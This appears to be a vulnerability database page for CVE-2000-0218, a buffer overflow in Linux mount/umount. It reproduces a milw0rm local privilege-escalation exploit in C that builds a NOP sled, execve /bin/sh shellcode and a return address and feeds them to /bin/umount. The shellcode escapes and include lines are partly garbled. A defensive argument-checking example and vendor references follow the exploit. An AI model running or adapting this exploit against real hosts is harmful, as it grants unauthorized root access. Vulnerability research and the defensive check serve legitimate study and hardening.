Linux Privilege Escalation Vulnerability


Vulnerability ID: 1105256    Vulnerability type: Buffer overflow
Published: 1996-08-13    Updated: 2000-02-03
CVE ID: CVE-2000-0218
CNNVD-ID: CNNVD-200002-028
Platform: Multiple    CVSS score: 7.2
|Vulnerability Source
https://www.exploit-db.com/exploits/321
https://www.securityfocus.com/bid/83001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200002-028
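|Vulnerability Details
A buffer overflow exists in Linux mount and umount. A local user can gain root privileges by supplying an overly long relative pathname.
|Exploit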
/* Reminder - Be sure to fix the includes /str0ke */
-------------------------------------- linux_umount_exploit.c ----------
#include 
#include 
#include 
#include 
#include 
#include 

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0f"
   "xb8x1bx56x34x12x35x10x56x34x12x8dx4ex0bx8bxd1xcd"
   "x80x33xc0x40xcdx80xe8xd7xffxffxff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memoryn");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   execl(PATH_MOUNT, "umount", buff, NULL);
}


// milw0rm.com [1996-08-13]
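
An added defensive example, not part of the original exploit or of mount/umount: an argument check that a wrapper or audit hook could apply before a path reaches a setuid mount or umount binary. It flags the traits of the buffer built above (an oversized argument, a long run of 0x90 filler, raw control bytes); the limits and all function names are assumptions for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed policy limits for this example; they are not from the advisory. */
#define MAX_ARG_LEN 255   /* longest device or mount-point path accepted */
#define MAX_NOP_RUN 16    /* consecutive 0x90 bytes treated as a NOP sled */
#define SCAN_LIMIT  8192  /* stop scanning here; anything longer is rejected */

enum verdict { ARG_OK, ARG_TOO_LONG, ARG_CONTROL_BYTES, ARG_NOP_SLED };

/* Classify one argument destined for mount/umount before it is used. */
enum verdict check_mount_arg(const char *arg)
{
    size_t len = 0, run = 0;
    int control = 0;

    for (; arg[len] != '\0' && len < SCAN_LIMIT; len++) {
        unsigned char c = (unsigned char)arg[len];
        run = (c == 0x90) ? run + 1 : 0;
        if (run >= MAX_NOP_RUN)
            return ARG_NOP_SLED;          /* most specific signal first */
        if (c < 0x20 || c == 0x7f)
            control = 1;                  /* opcode bytes often land here */
    }
    if (control)
        return ARG_CONTROL_BYTES;
    return len > MAX_ARG_LEN ? ARG_TOO_LONG : ARG_OK;
}

/* Constructed sample: n copies of `fill`, NUL-terminated (max 2047 bytes). */
const char *sample_arg(size_t n, unsigned char fill)
{
    static char buf[2048];
    if (n > sizeof buf - 1)
        n = sizeof buf - 1;
    memset(buf, fill, n);
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    static const char *names[] = { "ok", "too-long", "control-bytes", "nop-sled" };
    printf("/mnt/cdrom   -> %s\n", names[check_mount_arg("/mnt/cdrom")]);
    printf("1024 x 'a'   -> %s\n", names[check_mount_arg(sample_arg(1024, 'a'))]);
    printf("1000 x 0x90  -> %s\n", names[check_mount_arg(sample_arg(1000, 0x90))]);
    return 0;
}
```

A check like this is defence in depth for hosts that cannot be patched immediately; it does not replace the vendor update referenced in CSSA-2000-002.0.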
|Affected Products
Caldera OpenLinux 2.3
|References

Source: OSVDB
Name: 7004
Link: http://www.osvdb.org/7004
Source: OSVDB
Name: 6980
Link: http://www.osvdb.org/6980
Source: CALDERA
Name: CSSA-2000-002.0
Link: ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2000-002.0.txt
